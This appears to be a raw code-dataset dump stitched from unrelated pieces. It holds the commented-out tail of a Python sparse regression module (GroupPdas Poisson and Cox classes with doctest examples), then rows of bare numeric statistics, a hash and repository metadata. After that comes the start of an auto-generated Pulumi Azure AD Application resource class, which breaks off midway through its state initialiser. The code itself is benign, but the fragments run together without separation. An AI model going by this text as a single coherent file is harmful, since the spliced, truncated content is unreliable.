# super(GroupPdasLogistic, self).__init__(
# algorithm_type="GroupPdas", model_type="Logistic", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau
# )
# self.data_type = 2
# @fix_docs
# class GroupPdasPoisson(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> x = np.random.normal(0, 1, 100 * 150).reshape((100, 150))
# >>> beta = np.hstack((np.array([1, 1, -1, -1, -1]), np.zeros(145)))
# >>> lam = np.exp(np.matmul(x, beta))
# >>> y = np.random.poisson(lam=lam)
# >>> model = GroupPdasPoisson(path_type="seq", support_size=[5])
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasPoisson(path_type="seq")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasPoisson(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1,
# always_select=[], tau=0.
# ):
# super(GroupPdasPoisson, self).__init__(
# algorithm_type="GroupPdas", model_type="Poisson", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path,
# always_select=always_select, tau=tau)
# self.data_type = 2
# @fix_docs
# class GroupPdasCox(bess_base):
# """
# Examples
# --------
# ### Sparsity known
# >>> from bess.linear import *
# >>> import numpy as np
# >>> np.random.seed(12345)
# >>> data = make_glm_data(100, 200, family="cox", cv=1, rho=0, sigma=1, c=10)
# >>> model = GroupPdasCox(path_type="seq", support_size=[5])
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# ### Sparsity unknown
# >>> # path_type="seq", Default:support_size=[1,2,...,min(x.shape[0], x.shape[1])]
# >>> model = GroupPdasCox(path_type="seq")
# >>> model.fit(data.x, data.y, is_normal=True)
# >>> model.predict(data.x)
# >>> # path_type="pgs", Default:s_min=1, s_max=X.shape[1], K_max = int(math.log(p, 2/(math.sqrt(5) - 1)))
# >>> model = GroupPdasCox(path_type="pgs")
# >>> model.fit(X=x, y=y)
# >>> model.predict(x)
# """
# def __init__(self, max_iter=20, exchange_num=5, path_type="seq", is_warm_start=True, support_size=None, alpha=None, s_min=None, s_max=None,
# K_max=1, epsilon=0.0001, lambda_min=None, lambda_max=None, ic_type="ebic", cv=1, is_screening=False, screening_size=None, powell_path=1
# ):
# super(GroupPdasCox, self).__init__(
# algorithm_type="GroupPdas", model_type="Cox", path_type=path_type, max_iter=max_iter, exchange_num=exchange_num,
# is_warm_start=is_warm_start, support_size=support_size, alpha=alpha, s_min=s_min, s_max=s_max, K_max=K_max,
# epsilon=epsilon, lambda_min=lambda_min, lambda_max=lambda_max, ic_type=ic_type, cv=cv, is_screening=is_screening, screening_size=screening_size, powell_path=powell_path)
# self.data_type = 3
| 41.4494
| 210
| 0.597289
| 6,776
| 48,330
| 4.021842
| 0.040289
| 0.040511
| 0.02664
| 0.011008
| 0.926538
| 0.908374
| 0.905438
| 0.88199
| 0.881403
| 0.869955
| 0
| 0.025133
| 0.243431
| 48,330
| 1,165
| 211
| 41.484979
| 0.72017
| 0.703931
| 0
| 0.728507
| 0
| 0
| 0.011811
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095023
| false
| 0
| 0.072398
| 0
| 0.262443
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d3ee88eac3cdcac39ccdf8e39bbb4f3dbd4f5b3
| 84,489
|
py
|
Python
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 11
|
2019-09-17T20:41:13.000Z
|
2021-12-28T02:06:40.000Z
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 144
|
2019-05-08T20:53:11.000Z
|
2022-03-31T15:20:46.000Z
|
sdk/python/pulumi_azuread/application.py
|
AaronFriel/pulumi-azuread
|
d3161e0efd9bb7e67e26c0700d1b8e04e3c0184b
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2019-10-05T10:34:37.000Z
|
2022-01-18T18:43:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApplicationArgs', 'Application']
@pulumi.input_type
class ApplicationArgs:
def __init__(__self__, *,
display_name: pulumi.Input[str],
api: Optional[pulumi.Input['ApplicationApiArgs']] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
optional_claims: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input['ApplicationPublicClientArgs']] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input['ApplicationWebArgs']] = None):
"""
The set of arguments for constructing a Application resource.
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input['ApplicationApiArgs'] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input['ApplicationOptionalClaimsArgs'] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input['ApplicationPublicClientArgs'] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input['ApplicationSinglePageApplicationArgs'] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input['ApplicationWebArgs'] web: A `web` block as documented below, which configures web related settings for this application.
"""
pulumi.set(__self__, "display_name", display_name)
if api is not None:
pulumi.set(__self__, "api", api)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if device_only_auth_enabled is not None:
pulumi.set(__self__, "device_only_auth_enabled", device_only_auth_enabled)
if fallback_public_client_enabled is not None:
pulumi.set(__self__, "fallback_public_client_enabled", fallback_public_client_enabled)
if feature_tags is not None:
pulumi.set(__self__, "feature_tags", feature_tags)
if group_membership_claims is not None:
pulumi.set(__self__, "group_membership_claims", group_membership_claims)
if identifier_uris is not None:
pulumi.set(__self__, "identifier_uris", identifier_uris)
if logo_image is not None:
pulumi.set(__self__, "logo_image", logo_image)
if marketing_url is not None:
pulumi.set(__self__, "marketing_url", marketing_url)
if oauth2_post_response_required is not None:
pulumi.set(__self__, "oauth2_post_response_required", oauth2_post_response_required)
if optional_claims is not None:
pulumi.set(__self__, "optional_claims", optional_claims)
if owners is not None:
pulumi.set(__self__, "owners", owners)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
if privacy_statement_url is not None:
pulumi.set(__self__, "privacy_statement_url", privacy_statement_url)
if public_client is not None:
pulumi.set(__self__, "public_client", public_client)
if required_resource_accesses is not None:
pulumi.set(__self__, "required_resource_accesses", required_resource_accesses)
if sign_in_audience is not None:
pulumi.set(__self__, "sign_in_audience", sign_in_audience)
if single_page_application is not None:
pulumi.set(__self__, "single_page_application", single_page_application)
if support_url is not None:
pulumi.set(__self__, "support_url", support_url)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if template_id is not None:
pulumi.set(__self__, "template_id", template_id)
if terms_of_service_url is not None:
pulumi.set(__self__, "terms_of_service_url", terms_of_service_url)
if web is not None:
pulumi.set(__self__, "web", web)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The display name for the application.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def api(self) -> Optional[pulumi.Input['ApplicationApiArgs']]:
"""
An `api` block as documented below, which configures API related settings for this application.
"""
return pulumi.get(self, "api")
@api.setter
def api(self, value: Optional[pulumi.Input['ApplicationApiArgs']]):
pulumi.set(self, "api", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]:
"""
A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="deviceOnlyAuthEnabled")
def device_only_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether this application supports device authentication without a user. Defaults to `false`.
"""
return pulumi.get(self, "device_only_auth_enabled")
@device_only_auth_enabled.setter
def device_only_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "device_only_auth_enabled", value)
@property
@pulumi.getter(name="fallbackPublicClientEnabled")
def fallback_public_client_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
"""
return pulumi.get(self, "fallback_public_client_enabled")
@fallback_public_client_enabled.setter
def fallback_public_client_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_public_client_enabled", value)
@property
@pulumi.getter(name="featureTags")
def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:
"""
A `feature_tags` block as described below. Cannot be used together with the `tags` property.
"""
return pulumi.get(self, "feature_tags")
@feature_tags.setter
def feature_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]):
pulumi.set(self, "feature_tags", value)
@property
@pulumi.getter(name="groupMembershipClaims")
def group_membership_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
"""
return pulumi.get(self, "group_membership_claims")
@group_membership_claims.setter
def group_membership_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_membership_claims", value)
@property
@pulumi.getter(name="identifierUris")
def identifier_uris(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
"""
return pulumi.get(self, "identifier_uris")
@identifier_uris.setter
def identifier_uris(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "identifier_uris", value)
@property
@pulumi.getter(name="logoImage")
def logo_image(self) -> Optional[pulumi.Input[str]]:
"""
A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
"""
return pulumi.get(self, "logo_image")
@logo_image.setter
def logo_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_image", value)
@property
@pulumi.getter(name="marketingUrl")
def marketing_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's marketing page.
"""
return pulumi.get(self, "marketing_url")
@marketing_url.setter
def marketing_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "marketing_url", value)
@property
@pulumi.getter(name="oauth2PostResponseRequired")
def oauth2_post_response_required(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
"""
return pulumi.get(self, "oauth2_post_response_required")
@oauth2_post_response_required.setter
def oauth2_post_response_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "oauth2_post_response_required", value)
@property
@pulumi.getter(name="optionalClaims")
def optional_claims(self) -> Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]:
"""
An `optional_claims` block as documented below.
"""
return pulumi.get(self, "optional_claims")
@optional_claims.setter
def optional_claims(self, value: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]):
pulumi.set(self, "optional_claims", value)
@property
@pulumi.getter
def owners(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
"""
return pulumi.get(self, "owners")
@owners.setter
def owners(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "owners", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
@property
@pulumi.getter(name="privacyStatementUrl")
def privacy_statement_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's privacy statement.
"""
return pulumi.get(self, "privacy_statement_url")
@privacy_statement_url.setter
def privacy_statement_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "privacy_statement_url", value)
@property
@pulumi.getter(name="publicClient")
def public_client(self) -> Optional[pulumi.Input['ApplicationPublicClientArgs']]:
"""
A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
"""
return pulumi.get(self, "public_client")
@public_client.setter
def public_client(self, value: Optional[pulumi.Input['ApplicationPublicClientArgs']]):
pulumi.set(self, "public_client", value)
@property
@pulumi.getter(name="requiredResourceAccesses")
def required_resource_accesses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]:
"""
A collection of `required_resource_access` blocks as documented below.
"""
return pulumi.get(self, "required_resource_accesses")
@required_resource_accesses.setter
def required_resource_accesses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]):
pulumi.set(self, "required_resource_accesses", value)
@property
@pulumi.getter(name="signInAudience")
def sign_in_audience(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
"""
return pulumi.get(self, "sign_in_audience")
@sign_in_audience.setter
def sign_in_audience(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sign_in_audience", value)
@property
@pulumi.getter(name="singlePageApplication")
def single_page_application(self) -> Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]:
"""
A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
"""
return pulumi.get(self, "single_page_application")
@single_page_application.setter
def single_page_application(self, value: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]):
pulumi.set(self, "single_page_application", value)
@property
@pulumi.getter(name="supportUrl")
def support_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's support page.
"""
return pulumi.get(self, "support_url")
@support_url.setter
def support_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "support_url", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="templateId")
def template_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "template_id")
@template_id.setter
def template_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template_id", value)
@property
@pulumi.getter(name="termsOfServiceUrl")
def terms_of_service_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's terms of service statement.
"""
return pulumi.get(self, "terms_of_service_url")
@terms_of_service_url.setter
def terms_of_service_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "terms_of_service_url", value)
@property
@pulumi.getter
def web(self) -> Optional[pulumi.Input['ApplicationWebArgs']]:
"""
A `web` block as documented below, which configures web related settings for this application.
"""
return pulumi.get(self, "web")
@web.setter
def web(self, value: Optional[pulumi.Input['ApplicationWebArgs']]):
pulumi.set(self, "web", value)
@pulumi.input_type
class _ApplicationState:
def __init__(__self__, *,
api: Optional[pulumi.Input['ApplicationApiArgs']] = None,
app_role_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
disabled_by_microsoft: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
logo_url: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_permission_scope_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
object_id: Optional[pulumi.Input[str]] = None,
optional_claims: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input['ApplicationPublicClientArgs']] = None,
publisher_domain: Optional[pulumi.Input[str]] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input['ApplicationWebArgs']] = None):
"""
Input properties used for looking up and filtering Application resources.
:param pulumi.Input['ApplicationApiArgs'] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] app_role_ids: A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The Application ID (also called Client ID).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[str] disabled_by_microsoft: Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] logo_url: CDN URL to the application's logo, as uploaded with the `logo_image` property.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] oauth2_permission_scope_ids: A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input[str] object_id: The application's object ID.
:param pulumi.Input['ApplicationOptionalClaimsArgs'] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input['ApplicationPublicClientArgs'] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[str] publisher_domain: The verified publisher domain for the application.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input['ApplicationSinglePageApplicationArgs'] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input['ApplicationWebArgs'] web: A `web` block as documented below, which configures web related settings for this application.
"""
if api is not None:
pulumi.set(__self__, "api", api)
if app_role_ids is not None:
pulumi.set(__self__, "app_role_ids", app_role_ids)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if device_only_auth_enabled is not None:
pulumi.set(__self__, "device_only_auth_enabled", device_only_auth_enabled)
if disabled_by_microsoft is not None:
pulumi.set(__self__, "disabled_by_microsoft", disabled_by_microsoft)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if fallback_public_client_enabled is not None:
pulumi.set(__self__, "fallback_public_client_enabled", fallback_public_client_enabled)
if feature_tags is not None:
pulumi.set(__self__, "feature_tags", feature_tags)
if group_membership_claims is not None:
pulumi.set(__self__, "group_membership_claims", group_membership_claims)
if identifier_uris is not None:
pulumi.set(__self__, "identifier_uris", identifier_uris)
if logo_image is not None:
pulumi.set(__self__, "logo_image", logo_image)
if logo_url is not None:
pulumi.set(__self__, "logo_url", logo_url)
if marketing_url is not None:
pulumi.set(__self__, "marketing_url", marketing_url)
if oauth2_permission_scope_ids is not None:
pulumi.set(__self__, "oauth2_permission_scope_ids", oauth2_permission_scope_ids)
if oauth2_post_response_required is not None:
pulumi.set(__self__, "oauth2_post_response_required", oauth2_post_response_required)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if optional_claims is not None:
pulumi.set(__self__, "optional_claims", optional_claims)
if owners is not None:
pulumi.set(__self__, "owners", owners)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
if privacy_statement_url is not None:
pulumi.set(__self__, "privacy_statement_url", privacy_statement_url)
if public_client is not None:
pulumi.set(__self__, "public_client", public_client)
if publisher_domain is not None:
pulumi.set(__self__, "publisher_domain", publisher_domain)
if required_resource_accesses is not None:
pulumi.set(__self__, "required_resource_accesses", required_resource_accesses)
if sign_in_audience is not None:
pulumi.set(__self__, "sign_in_audience", sign_in_audience)
if single_page_application is not None:
pulumi.set(__self__, "single_page_application", single_page_application)
if support_url is not None:
pulumi.set(__self__, "support_url", support_url)
